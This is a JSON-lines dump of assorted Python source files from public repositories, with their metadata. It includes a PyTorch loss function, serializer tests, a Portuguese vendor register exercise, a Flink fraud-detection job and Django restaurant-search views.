self.opt.backprop_eig > EPSILON:\n min_lambda = ExtractSMinEigenValue.apply(C_mat[i, :, :])\n else:\n est_lambda = torch.eig(C_mat[i, :, :])\n est_lambda = est_lambda[0]\n\n img_part = est_lambda[:, 1]\n real_part = est_lambda[:, 0]\n\n min_lambda = torch.min(real_part[torch.abs(img_part.data) < 1e-6]).item()\n\n est_up_n = torch.matmul(torch.pinverse(H[i, :, :] - min_lambda * identity_mat), \n g[i, :, :])\n\n up_diff_cos = cos_criterion(est_up_n[:, 0], \n gt_up_vector[i, :])\n\n # print('min_lambda ', min_lambda)\n # print('i %d up_diff_cos %f ang_diff %f'%(i, up_diff_cos.item(), torch.acos(torch.clamp(up_diff_cos, -1.0, 1.0)).item() * 180/math.pi))\n\n if up_diff_cos.item() < (1.0 - 1e-6):\n up_diff_angle_rad = torch.acos(up_diff_cos)\n else:\n up_diff_angle_rad = 1.0 - up_diff_cos\n \n pose_term += self.opt.w_pose * up_diff_angle_rad/float(num_samples)\n\n # print('pose_term %f'%pose_term.item())\n\n return pose_term\n \n\n def rotate_normal(self, pred_global_n_unit, pred_rot):\n num_samples = pred_global_n_unit.size(0)\n num_c = pred_global_n_unit.size(1)\n num_pixels = pred_global_n_unit.size(2) * pred_global_n_unit.size(3)\n\n pred_global_n_unit_flat = pred_global_n_unit.view(num_samples, \n num_c, \n num_pixels)\n\n pred_cam_n_unit_flat = torch.bmm(pred_rot, pred_global_n_unit_flat)\n pred_cam_n_unit = pred_cam_n_unit_flat.view(num_samples, num_c, \n pred_global_n_unit.size(2), \n pred_global_n_unit.size(3))\n\n return pred_cam_n_unit\n\n\n def __call__(self, input_images, pred_cam_geo_unit, pred_up_geo_unit, pred_weights, targets):\n gt_up_vector = Variable(targets['gt_up_vector'].cuda(), \n requires_grad=False) \n gt_rp = Variable(targets['gt_rp'].cuda(), \n requires_grad=False)\n\n gt_upright_geo = Variable(targets['upright_geo'].cuda(), \n requires_grad=False)\n gt_cam_geo = Variable(targets['cam_geo'].cuda(), \n requires_grad=False)\n \n gt_mask = Variable(targets['gt_mask'].cuda(), \n requires_grad=False)\n \n total_loss = 0.\n\n if self.opt.w_pose > EPSILON:\n pose_term = self.compute_pose_loss(gt_up_vector, \n pred_cam_geo_unit, \n pred_up_geo_unit, \n pred_weights)\n total_loss += pose_term\n else:\n pose_term = torch.tensor(0.).cuda()\n\n if self.opt.w_cam > EPSILON:\n cam_geo_term = 0.0\n for i in range(0, 3):\n cam_geo_term += self.opt.w_cam * self.compute_cos_sim_loss(gt_cam_geo[:, i*3:(i+1)*3, :, :], \n pred_cam_geo_unit[:, i*3:(i+1)*3, :, :], \n gt_mask)\n\n cam_geo_term = cam_geo_term/3.0\n print('cam_geo_term ', cam_geo_term.item())\n total_loss = total_loss + cam_geo_term\n\n if self.opt.w_grad > EPSILON:\n cam_grad_term = 0.\n for j in range(self.num_scales):\n stride = 2**j\n cam_grad_term += self.opt.w_grad * self.opt.w_cam * self.compute_normal_gradient_loss(gt_cam_geo[:, :, ::stride, ::stride], \n pred_cam_geo_unit[:, :, ::stride, ::stride], \n gt_mask[:, ::stride, ::stride])\n\n print('cam_grad_term ', cam_grad_term.item())\n total_loss += cam_grad_term\n\n else:\n cam_geo_term = torch.tensor(0.).cuda()\n\n if self.opt.w_up > EPSILON:\n upright_geo_term = self.opt.w_up * self.compute_cos_sim_loss(gt_upright_geo, \n pred_up_geo_unit, \n gt_mask)\n\n print('upright_geo_term ', upright_geo_term.item())\n total_loss = total_loss + upright_geo_term\n\n if self.opt.w_grad > EPSILON:\n upright_grad_term = 0.\n for j in range(self.num_scales):\n stride = 2**j\n upright_grad_term += self.opt.w_grad * self.opt.w_up * self.compute_normal_gradient_loss(gt_upright_geo[:, :, ::stride, ::stride], \n pred_up_geo_unit[:, :, ::stride, ::stride], \n gt_mask[:, ::stride, ::stride])\n\n print('upright_grad_term ', upright_grad_term.item())\n total_loss += upright_grad_term\n else:\n upright_n_term = torch.tensor(0.).cuda()\n\n\n self.total_loss = total_loss\n\n return total_loss.item(), cam_geo_term.item(), upright_geo_term.item(), pose_term.item()\n\n def get_loss_var(self):\n return self.total_loss\n\n","repo_name":"zhengqili/UprightNet","sub_path":"models/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":19097,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"72"} +{"seq_id":"19691660110","text":"import json\n\npath_data = \"data/levels-data\"\n\ndef read_lvl_data(lvl):\n \"\"\"The data is stored in the .txt file as followed: lat, lon, size\n where lat and long is the starting loc \n\n Args:\n lvl (int): the level you want to retrieve the data for\n\n Returns:\n list: [lat, lon, size]\n \"\"\"\n with open(path_data+f\"/lvl{lvl}.json\") as file:\n data = json.load(file)\n return data","repo_name":"LilianBsc/loc-and-kiss","sub_path":"loc-and-kiss/read_src.py","file_name":"read_src.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40773243725","text":"\"\"\"Tests YAML serializer\"\"\"\nimport mock\n\nfrom pymco.serializers import yaml as _yaml\n\n\ndef test_serialize(yaml, msg):\n \"\"\"Test msg serialization\"\"\"\n assert yaml.serialize(msg) == \"\"\":agent: discovery\n:body: ping\n:collective: mcollective\n:filter:\n agent: []\n cf_class: []\n compound: []\n fact: []\n identity: []\n:msgtime: 123\n:requestid: 6ef11a5053008b54c03ca934972fdfa45448439d\n:senderid: mco1\n:ttl: 60\n\"\"\"\n\n\ndef test_serialize_data(yaml, msg_with_data):\n assert yaml.serialize(msg_with_data) == \"\"\":agent: puppet\n:body:\n :action: runonce\n :data:\n :noop: true\n :process_results: true\n :ssl_msgtime: 1421878604\n :ssl_ttl: 60\n:collective: mcollective\n:filter:\n agent: []\n cf_class: []\n compound: []\n fact: []\n identity: []\n:msgtime: 123\n:requestid: 6ef11a5053008b54c03ca934972fdfa45448439d\n:senderid: mco1\n:ttl: 60\n\"\"\"\n\n\ndef test_deserialize(yaml, yaml_response):\n assert yaml.deserialize(yaml_response) == {\n ':senderid': 'mco1',\n ':requestid': '335a3e8261e4589499d366862b328816',\n ':senderagent': 'discovery',\n ':msgtime': 1384022186,\n ':body': 'pong',\n }\n\n\ndef test_symbol_constructor():\n loader, node = mock.Mock(), mock.Mock(value='foo')\n assert _yaml.symbol_constructor(loader, node) == ':foo'\n\n\ndef test_ruby_object_constructor():\n loader, node = mock.Mock(), mock.Mock()\n assert _yaml.ruby_object_constructor(\n loader, 'Puppet:Resuource', node\n ) == loader.construct_yaml_map.return_value\n loader.construct_yaml_map.assert_called_once_with(node)\n","repo_name":"rafaduran/python-mcollective","sub_path":"tests/unit/serializers/test_yaml.py","file_name":"test_yaml.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"72"} +{"seq_id":"33408481120","text":"vendedores = {}\ncodigos = []\nop = 9999\n\n\nwhile (op != 0):\n print('\\n--------MENU----------\\n')\n print('1 - Fazer cadastro')\n print('2 - Fazer login')\n print('0 - Sair')\n\n\n op = int(input('Digite o numero correspondente à opção desejada: '))\n\n\n if (op == 1):\n usuario_valido = False\n while usuario_valido == False:\n usuario = input('Digite seu usuario: ')\n for user in vendedores.keys():\n if user == usuario:\n print('Esse usuario já está cadastrado. Tente novamente.')\n break\n else:\n usuario_valido = True\n senha = input('Digite sua senha: ')\n nome = input('Digite seu nome completo: ')\n\n\n cpf_valido = False\n\n\n while cpf_valido == False:\n cpf = (input('Digite seu cpf: '))\n if len(cpf) == 11:\n cpf_valido = True\n if cpf_valido:\n print('CPF válido')\n else:\n print('CPF inválido, Tente novamente')\n\n\n tel = int(input('Digite seu telefone: '))\n email = input('Digite seu email: ')\n vendedores[usuario] = [senha, nome, cpf, tel, email, []]\n print('Cadastro Realizado Com Sucesso')\n break\n\n\n elif (op == 2):\n sistema = False\n while sistema == False:\n usuario = input('Digite seu usuario: ')\n senha = input('Digite sua senha: ')\n\n\n for user in vendedores:\n if (user == usuario):\n senha1 = vendedores[usuario][0]\n if (senha1 == senha):\n sistema = True\n print(f'Bem-vindo(a), {vendedores[usuario][1]}!')\n\n\n op2 = 99999\n while (op2 != 0):\n print('\\n--------LOGADO----------\\n')\n print('1 - Cadastrar novo produto para venda')\n print('2 - Buscar produtos cadastrados')\n print('3 - Remover produtos cadastrados')\n print('4 - Atualizar produtos cadastrados')\n print('5 - Atualizar senha')\n print('0- Sair')\n\n\n op2 = int(input('Digite o numero correspondente à opção desejada: '))\n\n\n if (op2 == 1):\n produtos = {}\n codigo_valido = False\n\n\n while codigo_valido == False:\n codigo = (input('Digite o código do produto: '))\n for cod in codigos:\n if cod == codigo:\n print('Já existe um produto com esse código. Por favor, tente novamente.')\n break\n else:\n codigo_valido = True\n\n\n nome = input('Digite o nome do produto: ')\n preco = float(input('Digite o preço do produto: '))\n quantidade = int(input('Digite a quantidade em estoque: '))\n vendedores[usuario][5].append({'nome': nome, 'codigo': codigo, 'preco': preco, 'quantidade': quantidade})\n codigos.append(codigo)\n print('Produto cadastrado com sucesso!')\n\n\n elif (op2 == 2):\n print('\\n--------BUSCAR PRODUTO CADASTRADO---------\\n')\n nome_produto = input('Digite o nome do produto: ')\n\n\n achados = False\n\n\n for produto in vendedores[usuario][5]:\n if produto['nome'].find(nome_produto) != -1:\n print('CODIGO - NOME - PREÇO - QUANTIDADE')\n print(f\"{produto['codigo']} - {produto['nome']} - {produto['preco']} - {produto['quantidade']}\")\n achados = True\n\n\n if achados == False:\n print('Produto não encontrado.')\n\n\n elif (op2 == 3):\n print('\\n------------Produtos Cadastrados------------\\n')\n print('CODIGO - NOME - PREÇO - QUANTIDADE ')\n for produto in vendedores[usuario][5]:\n print(f\"{produto['codigo']} - {produto['nome']} - {produto['preco']} - {produto['quantidade']}\")\n\n\n codigo_produto = input('digite o codigo do produto que deseja remover: ')\n produtos_vendedor = vendedores[usuario][5]\n indice_produto = -1\n\n\n for i in range(len(produtos_vendedor)):\n if produtos_vendedor[i]['codigo'] == codigo_produto:\n indice_produto = i\n break\n\n\n if indice_produto == -1:\n print('Produto não encontrado.')\n else:\n vendedores[usuario][5].remove(produtos_vendedor[indice_produto])\n codigos.remove(codigo_produto)\n print('Produto removido com sucesso!')\n\n\n elif (op2 == 4):\n print('\\n------------Produtos Cadastrados------------\\n')\n print('CODIGO - NOME - PREÇO - QUANTIDADE')\n for produto in vendedores[usuario][5]:\n print(f\"{produto['codigo']} - {produto['nome']} - {produto['preco']} - {produto['quantidade']}\")\n\n\n codigo_produto = input('digite o codigo do produto que deseja atualizar: ')\n produtos_vendedor = vendedores[usuario][5]\n indice_produto = -1\n\n\n for i in range(len(produtos_vendedor)):\n if produtos_vendedor[i]['codigo'] == codigo_produto:\n indice_produto = i\n break\n\n\n if indice_produto == -1:\n print('Produto não encontrado.')\n\n\n else:\n novo_nome = input('Digite o novo nome do produto ou pressione ENTER para manter o mesmo: ')\n if novo_nome != \"\":\n produtos_vendedor[indice_produto]['nome'] = novo_nome\n\n\n novo_preco = input('Digite o novo preco do produto ou pressione ENTER para manter o mesmo: ')\n if novo_preco != \"\":\n produtos_vendedor[indice_produto]['preco'] = float(novo_preco)\n\n\n nova_quantidade = input('Digite a nova quantidade do produto ou pressione ENTER para manter a mesma: ')\n if nova_quantidade != \"\":\n produtos_vendedor[indice_produto]['quantidade'] = int(nova_quantidade)\n print('Produto atualizado com sucesso!')\n\n\n elif (op2 == 5):\n nova_senha = input('digite a nova senha: ')\n vendedores[usuario][0] = nova_senha\n print('Senha atualizada com sucesso!')\n\n\n elif (op2 != 0):\n print('Seleçao invalida')\n\n\n else:\n print('-------DESLOGADO--------')\n\n\n else:\n print('Senha Incorreta')\n else:\n print('Usuário não encontrado')\n\n\n elif (op != 0):\n print('Seleçao invalida')\n\n\n else:\n print('Programa Finalizado')\n","repo_name":"samuk900/SamuelSenyeBrendaeRoselanio","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8514,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36415715508","text":"#!/usr/bin/python3\n\n# Removes a character at a specified index n\ndef remove_char_at(str, n):\n strCopy = \"\"\n for i in range(len(str)):\n if i == n:\n continue\n strCopy += str[i]\n return strCopy\n","repo_name":"chee-zaram/alx-higher_level_programming","sub_path":"0x01-python-if_else_loops_functions/101-remove_char_at.py","file_name":"101-remove_char_at.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"738630174","text":"import json\nfrom datetime import datetime\n\nimport redis2\nimport requests\nfrom pyflink.common.serialization import SimpleStringSchema\nfrom pyflink.common.typeinfo import Types\nfrom pyflink.datastream import StreamExecutionEnvironment\nfrom pyflink.datastream.connectors import FlinkKafkaConsumer, FlinkKafkaProducer\nfrom pyflink.datastream.functions import RuntimeContext, MapFunction\n\nclass FraudDetector(MapFunction):\n\tdef open(self, runtime_context: RuntimeContext):\n\t\tself.r = redis2.Redis(host=conf['redis']['host'], port=conf['redis']['port'], db=conf['redis']['db'])\n\t\tself.ctx = runtime_context.get_metrics_group()\n\t\treturn super().open(runtime_context)\n\t\n\tdef raise_fraud(self, event, metadata):\n\t\tevent[\"meta\"] = metadata\n\t\turl = conf['slack']['webhook']\n\t\theaders = {'Content-Type': 'application/json'}\n\t\tpayload = {\n\t\t\t\"text\": \":warning: *Fraud Transaction Alert*\\n> Transaction ID: `{id}`\\n> Severity: `{severity}`\\n> Description: `{desc}`\".format(\n\t\t\t\tid=event[\"txn_id\"],\\\n\t\t\t\tseverity=event[\"meta\"][\"severity\"],\n\t\t\t\tdesc=event[\"meta\"][\"description\"]\n\t\t\t)\n\t\t}\n\t\tresponse = requests.post(\n\t\t\turl=url, \n\t\t\theaders=headers,\n\t\t\tjson=payload\n\t\t)\n\t\tself.ctx.add_group(\n\t\t\t\"dataset_id\", conf[\"kafka\"][\"source_topic\"]\n\t\t).add_group(\n\t\t\t\"txn_type\", \"fraud_txn\"\n\t\t).add_group(\n\t\t\t\"txn_id\",event[\"txn_id\"]\n\t\t).counter(\"txn_count\").inc(1)\n\t\tupdatedValue = json.dumps(event, separators=(',', ':'))\n\t\treturn updatedValue\n\n\n\tdef map(self, value):\n\t\tevent = json.loads(value)\n\t\tredis_data = self.r.get(event['sender_account_number'])\n\t\tif redis_data is None:\n\t\t\tmetadata = {\n\t\t\t\t\"fraud_processed\": \"False\", \n\t\t\t\t\"isFraud\": \"False\",\n\t\t\t\t\"description\": \"Profile not found\"\n\t\t\t}\n\t\t\tevent[\"meta\"] = metadata\n\t\t\tupdatedValue = json.dumps(event, separators=(',', ':'))\n\t\t\treturn updatedValue\n\t\telse:\n\t\t\tfraud_profile = json.loads(redis_data)\n\t\t\t# DT like rules:\n\t\t\ttry:\n\t\t\t\t# if receiver account is not active\n\t\t\t\tif event[\"receiver_account_details\"][\"account_status\"] != \"ACTIVE\":\n\t\t\t\t\tmetadata = {\n\t\t\t\t\t\t\"fraud_processed\": \"True\", \n\t\t\t\t\t\t\"isFraud\": \"True\",\n\t\t\t\t\t\t\"severity\": \"Severe\",\n\t\t\t\t\t\t\"description\": \"Receiver is a suspected mule account.\"\n\t\t\t\t\t}\n\t\t\t\t\treturn self.raise_fraud(event, metadata)\n\t\t\t\t# If txn amount is higher than the net spend across 3 months\n\t\t\t\telif event[\"txn_amount\"] >= fraud_profile[\"net_amount_spent\"]:\n\t\t\t\t\tlatest_txn_date = datetime.fromisoformat(fraud_profile[\"latest_txn_date\"])\n\t\t\t\t\tif (datetime.now(latest_txn_date.tzinfo) - latest_txn_date).days > 20:\n\t\t\t\t\t\tmetadata = {\n\t\t\t\t\t\t\t\"fraud_processed\": \"True\", \n\t\t\t\t\t\t\t\"isFraud\": \"True\",\n\t\t\t\t\t\t\t\"severity\": \"Severe\",\n\t\t\t\t\t\t\t\"description\": \"High spend from an dormant amount.\"\n\t\t\t\t\t\t}\n\t\t\t\t\t\treturn self.raise_fraud(event, metadata)\n\t\t\t\t\telse:\n\t\t\t\t\t\tmetadata = {\n\t\t\t\t\t\t\t\"fraud_processed\": \"True\", \n\t\t\t\t\t\t\t\"isFraud\": \"True\",\n\t\t\t\t\t\t\t\"severity\": \"Severe\",\n\t\t\t\t\t\t\t\"description\": \"Transaction amount higher than net spend.\"\n\t\t\t\t\t\t}\n\t\t\t\t\t\treturn self.raise_fraud(event, metadata)\n\t\t\t\t# if txn amount is higher than 3 std dev of daily avg amount\n\t\t\t\telif event[\"txn_amount\"] >= ((3 * fraud_profile[\"std_dev_net_amount_spent\"]) + fraud_profile[\"daily_avg_amount_spent\"]):\n\t\t\t\t\tmetadata = {\n\t\t\t\t\t\t\"fraud_processed\": \"True\", \n\t\t\t\t\t\t\"isFraud\": \"True\",\n\t\t\t\t\t\t\"severity\": \"Medium\",\n\t\t\t\t\t\t\"description\": \"Transaction amount considerably higher than daily average spend.\"\n\t\t\t\t\t}\n\t\t\t\t\treturn self.raise_fraud(event, metadata)\n\t\t\t\t# If daily avg cashflow is close to 0\n\t\t\t\telif (fraud_profile[\"daily_avg_cashflow\"] < 100000) and (fraud_profile[\"daily_avg_cashflow\"] > -100000):\n\t\t\t\t\tmetadata = {\n\t\t\t\t\t\t\"fraud_processed\": \"True\", \n\t\t\t\t\t\t\"isFraud\": \"True\",\n\t\t\t\t\t\t\"severity\": \"Medium\",\n\t\t\t\t\t\t\"description\": \"High transactions yet low cashflow.\"\n\t\t\t\t\t}\n\t\t\t\t\treturn self.raise_fraud(event, metadata)\n\t\t\t\t# If daily avg transaction count is high\n\t\t\t\telif fraud_profile[\"daily_avg_transactions\"] > 1:\n\t\t\t\t\tmetadata = {\n\t\t\t\t\t\t\"fraud_processed\": \"True\", \n\t\t\t\t\t\t\"isFraud\": \"True\",\n\t\t\t\t\t\t\"severity\": \"Low\",\n\t\t\t\t\t\t\"description\": \"High daily avg transactions.\"\n\t\t\t\t\t}\n\t\t\t\t\treturn self.raise_fraud(event, metadata)\n\t\t\texcept KeyError:\n\t\t\t\tmetadata = {\n\t\t\t\t\t\"fraud_processed\": \"False\", \n\t\t\t\t\t\"isFraud\": \"False\",\n\t\t\t\t\t\"description\": \"metric unavailable.\"\n\t\t\t\t}\n\t\t\t\tevent[\"meta\"] = metadata\n\t\t\t\tupdatedValue = json.dumps(event, separators=(',', ':'))\n\t\t\t\treturn updatedValue\n\t\t\texcept TypeError:\n\t\t\t\tmetadata = {\n\t\t\t\t\t\"fraud_processed\": \"False\", \n\t\t\t\t\t\"isFraud\": \"False\",\n\t\t\t\t\t\"description\": \"metric unavailable.\"\n\t\t\t\t}\n\t\t\t\tevent[\"meta\"] = metadata\n\t\t\t\tupdatedValue = json.dumps(event, separators=(',', ':'))\n\t\t\t\treturn updatedValue\n\t\t# None of rules satisifed, hence not a fraud\n\t\t\telse:\n\t\t\t\tmetadata = {\n\t\t\t\t\t\"fraud_processed\": \"True\", \n\t\t\t\t\t\"isFraud\": \"False\"\n\t\t\t\t}\n\t\t\t\tevent[\"meta\"] = metadata\n\t\t\t\tupdatedValue = json.dumps(event, separators=(',', ':'))\n\t\t\t\treturn updatedValue\n\n\n\tdef close(self):\n\t\treturn super().close()\n\n\nif __name__ == '__main__':\n\tconf = {\n\t\t\"slack\": {\n\t\t\t\"webhook\": \"\"\n\t\t},\n\t\t\"kafka\": {\n\t\t\t\"brokers\": \"obsrv-kafka-headless.kafka.svc.cluster.local:9092\",\n\t\t\t\"source_topic\": \"\",\n\t\t\t\"sink_topic\": \"-out\"\n\t\t},\n\t\t\"redis\": {\n\t\t\t\"host\": \"obsrv-redis-master.redis.svc.cluster.local\",\n\t\t\t\"port\": 6379,\n\t\t\t\"db\": 3\n\t\t}\n\t}\n\n\t# with open(\"/tmp/conf.json\", \"r\") as f:\n\t# \tconf = json.load(f)\n\tenv = StreamExecutionEnvironment.get_execution_environment()\n\tdeserialization_schema = SimpleStringSchema()\n\tserialization_schema = SimpleStringSchema() \n\tkafka_consumer = FlinkKafkaConsumer(\n\t topics=conf['kafka']['source_topic'],\n\t deserialization_schema=deserialization_schema,\n\t properties={'bootstrap.servers': conf['kafka']['brokers'], 'group.id': 'processor_python_group', 'auto.offset.reset': 'earliest'})\n\tkafka_sink = FlinkKafkaProducer(\n topic=conf['kafka']['sink_topic'],\n serialization_schema=serialization_schema,\n producer_config={'bootstrap.servers': conf['kafka']['brokers'], 'group.id': 'producer_group'})\n\tds = env.add_source(kafka_consumer)\n\tds.map(FraudDetector(), output_type=Types.STRING()).add_sink(kafka_sink)\n\tenv.execute('fraud-detector')\n","repo_name":"Sanketika-Obsrv/obsrv-adhoc-scripts","sub_path":"fraud_detection/flink/src/fraud_detector.py","file_name":"fraud_detector.py","file_ext":"py","file_size_in_byte":6037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20574520712","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Business, Review, Profile\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import ReviewForm\nfrom django.contrib import messages\nfrom gensim import corpora, models, similarities\nimport jieba\n\ndef search(request):\n request_type = request.POST.get(\"search_method\")\n content = request.POST.get(\"request_content\")\n if request.method == 'POST':\n if request_type == '1':\n business_list = Business.objects.filter(name__contains = content).order_by('-avg_rating')\n elif request_type == '2':\n business_list = Business.objects.filter(popular_dishes__contains = content).order_by('-avg_rating')\n else:\n business_list = Business.objects.filter(address__contains = content).order_by('-avg_rating')\n\n return render(request, 'display.html', {'businesses':business_list, })\n\n\n\ndef review_search(request):\n dictionary = corpora.Dictionary.load('review.dictionary')\n #corpus = corpora.MmCorpus('review.mm')\n lsi = models.LsiModel.load('review.lsi')\n print(lsi.num_topics)\n index = similarities.Similarity.load('review.index')\n\n query_txt = request.POST.get('review')\n query_string = \",\".join(jieba.cut_for_search(query_txt))\n query_words = query_string.split(\",\")\n print(query_words)\n query = dictionary.doc2bow(query_words)\n print(query)\n query_lsi = lsi[query]\n print(query_lsi)\n\n sims = index[query_lsi]\n result_list = sorted(enumerate(sims), key=lambda item: -item[1])\n result_list = result_list[0:20]\n print(result_list)\n review_list = []\n for result in result_list:\n try:\n result_review = Review.objects.get(file_num=int(result[0]))\n except:\n continue\n\n review_list.append(result_review)\n\n return render(request, 'display_review.html', {'reviews':review_list, })\n\ndef review_search_key_word(request):\n content = request.POST.get('keyword')\n review_list = Review.objects.filter(content__contains = content)\n\n return render(request, 'display_review.html', {'reviews':review_list, })\n\ndef search_region(shop_list, region, dish_style):\n dic = { '朝阳区':['建外大街', '大望路', '朝外大街', '朝阳公园/团结湖', '左家庄',\n '亮马桥/三元桥', '亚运村', '望京', '劲松/潘家园', '安贞', '芍药居',\n '国贸', '双井', '三里屯', '对外经贸', '酒仙桥', '管庄', '首都机场',\n '十八里店', '北苑家园', '十里堡', '东坝', '孙河', '马泉营', '定福庄',\n '四惠', '太阳宫', '青年路', '石佛营', '甜水园', '慈云寺','八里庄', '工人体育场',\n '百子湾', '传媒大学','二外', '双桥', '北京欢乐谷', '高碑店', '北京东站',\n '霄云路', '蓝色港湾', '燕莎','农业展览馆', '姚家园', '十里河', '立水桥',\n '小营', '北沙滩', '大屯', '小庄/红庙', '常营', '798/大山子', '草房',\n '游娱联盟壹号基地'], \n '东城区':['王府井/东单', '建国门/北京站', '东四', '安定门', '朝阳门', '东直门', '广渠门',\n '左安门', '沙子口', '前门', '崇文门', '天坛', '地安门', '和平里', '东四十条', '雍和宫/地坛',\n '南锣鼓巷/鼓楼东大街', '北新桥/簋街', '光明楼/龙潭湖', '沙滩/美术馆灯市口'], \n '西城区':['西单', '复兴门', '阜成门', '西直门/动物园', '新街口', '地安门', '前门', '牛街', '虎坊桥',\n '菜市口', '广内大街', '广外大街', '宣武门', '右安门', '西四', '月坛', '什刹海', '德外大街',\n '陶然亭', '南菜园','白纸坊'],\n '海淀区':['中关村', '五道口', '魏公村', '北太平庄', '苏州桥', '北下关', '公主坟/万寿路', '紫竹桥',\n '航天桥', '上地', '颐和园', '田村', '双榆树', '五棵松', '清河', '远大路', '香山', '大钟寺',\n '知春路', '西三旗', '四季青', '人民大学', '万柳', '学院桥', '军博', '农业大学西区'], \n '丰台区':['方庄', '六里桥/丽泽桥', '洋桥/木樨园', '宋家庄', '右安门', '北大地', '刘家窑', '青塔',\n '开阳里', '草桥', '看丹桥', '花乡', '大红门', '公益西桥', '云岗', '卢沟桥', '北京西站/六里桥',\n '分钟寺','成寿寺', '夏家胡同/纪家庙', '马家堡','角门', '马家堡','角门', '总部基地', '石榴庄',\n '槐房万达广场'], \n '石景山区':['苹果园', '古城','八角', '鲁谷', '模式口'],\n '大兴区':['亦庄', '旧宫', '黄村', '西红门'],\n '通州区':['宋庄', '西集', '物资学院', '果园', '梨园', '新华大街', '九棵树', '通州北苑', '武夷花园', '马驹桥',\n '次渠'], \n '昌平区':['回龙观', '天通苑', '昌平镇', '小汤山', '南口镇', '北七家', '沙河'], \n '房山区':['长阳镇', '城关镇', '窦店镇', '阎村镇', '燕山', '河北镇', '十渡镇', '青龙湖镇', '良乡'], \n '顺义区':['后沙峪', '马坡牛栏山', '南彩', '石园', '首都机场', '国展', '顺义'], \n '怀柔区':['商业街', '京北大世界', '斜街', '下园', '东关', '富乐大街', '庙城', '桥梓镇', '雁栖开发区',\n '渤海镇/慕田峪长城'], \n '延庆区':['八达岭镇', '大榆树镇', '大庄科乡', '井庄镇', '旧县镇', '康庄镇', '刘斌堡乡', '千家店镇', '沈家营镇',\n '四海镇', '香营乡', '延庆镇', '永宁镇', '张山营镇', '珍珠泉乡'], \n '密云区':['北庄镇', '不老屯镇', '大城子镇', '东邵渠镇', '冯家峪镇', '高岭镇', '古北口镇', '河南寨镇',\n '巨各庄镇', '经济开发区', '密云镇', '穆家峪镇', '十里堡镇', '石城镇', '太师屯镇', '西田各庄镇',\n '溪翁庄镇', '新城子镇']\n }\n enum_list = dic[region]\n #result = Business.objects.none()\n result = []\n for subregion in enum_list:\n temp_list = Business.objects.filter(region__contains = subregion).order_by('-avg_rating')\n if dish_style != '全部':\n temp_list = temp_list.filter(category__contains = dish_style).order_by('-avg_rating')\n for b in temp_list:\n result.append(b)\n\n return result\n\n\ndef multi_search(request):\n dish_style = request.POST.get(\"dish_style\")\n region = request.POST.get(\"region\")\n subregion = request.POST.get(\"subregion\")\n shop_list = Business.objects.all()\n\n if dish_style == None:\n dish_style = '全部'\n if region == None:\n region = '全市'\n if subregion == None:\n subregion = '全区'\n\n if dish_style != '全部':\n shop_list = shop_list.filter(category__contains = dish_style).order_by('-avg_rating')\n if region != '全市':\n if subregion != '全区':\n shop_list = shop_list.filter(region__contains = subregion).order_by('-avg_rating')\n else:\n shop_list = search_region(shop_list, region, dish_style)\n\n return render(request, 'display.html', {'businesses':shop_list})\n\ndef accurate(request, id):\n my_id = str(id)\n business = None\n try:\n business = Business.objects.get(shop_id = my_id)\n except:\n messages.info(request, \"店铺未找到\")\n reviews = Review.objects.filter(business__shop_id = my_id).order_by('-created_at')\n print(len(reviews))\n starred = 0\n\n if request.user.is_authenticated():\n profile = Profile.objects.get(user = request.user)\n try:\n profile.starred_list.get(shop_id = my_id)\n starred = 1\n except:\n starred = 0\n\n return render(request, 'show.html',{'business': business, 'reviews' : reviews, 'starred': starred})\n\ndef business_review(my_business):\n reviews = Review.objects.filter(business = my_business)\n return reviews\n\ndef recommend(request):\n dish_style = request.POST.get('mydish')\n region = request.POST.get('myregion')\n shop_list = Business.objects.all()\n\n if dish_style != None:\n shop_list = shop_list.filter(category__contains = dish_style).order_by('-avg_rating')\n if region != None:\n shop_list = shop_list.filter(region__contains = region).order_by('-avg_rating')\n\n return render(request, 'display.html', {'businesses':shop_list})\n\ndef region_search(request, region):\n shop_list = Business.objects.filter(region__contains = region).order_by('-avg_rating')\n return render(request, 'display.html', {'businesses':shop_list})\n\ndef dish_search(request, dish):\n shop_list = Business.objects.filter(category__contains = dish).order_by('-avg_rating')\n return render(request, 'display.html', {'businesses':shop_list})\n\n@login_required\ndef create(request, myshop_id):\n params = request.POST if request.method == 'POST' else None\n\n form = ReviewForm(params)\n if form.is_valid():\n review = form.save(commit = False)\n review.user = request.user\n review.author = request.user.username\n business = Business.objects.get(shop_id = myshop_id)\n review.business = business\n if len(review.content) >= 50:\n review.excerpt = review.content[:50]\n else:\n review.excerpt = review.content\n\n if review.grade < 0 or review.grade > 5:\n messages.info(request, '请输入0到5之间的分数')\n elif review.price < 0:\n messages.info(request, '请输入大于等于0的价格')\n else:\n review.save()\n messages.info(request, '评论《{}》创建成功'.format(review.excerpt))\n\n form = ReviewForm()\n\n return render(request, 'comment.html', {'form':form, 'shop_id':myshop_id})\n","repo_name":"effie-0/my-dianping","sub_path":"dianping/myrequest.py","file_name":"myrequest.py","file_ext":"py","file_size_in_byte":10233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15200941649","text":"def init(n):\r\n global par, rank\r\n par = [i for i in range(n)]\r\n rank = [0] * n\r\n\r\ndef find(x):\r\n global par\r\n if par[x] == x:\r\n return x\r\n else:\r\n par[x] = find(par[x])\r\n return par[x]\r\n\r\ndef unite(x, y):\r\n global par, rank\r\n x = find(x)\r\n y = find(y)\r\n if x == y:\r\n return\r\n if rank[x] < rank[y]:\r\n par[x] = y\r\n else:\r\n par[y] = x\r\n if rank[x] == rank[y]:\r\n rank[x] += 1\r\n\r\ndef same(x, y):\r\n return find(x) == find(y)\r\n\r\nN, M = map(int, input().split())\r\ninit(N)\r\np = list(map(int, 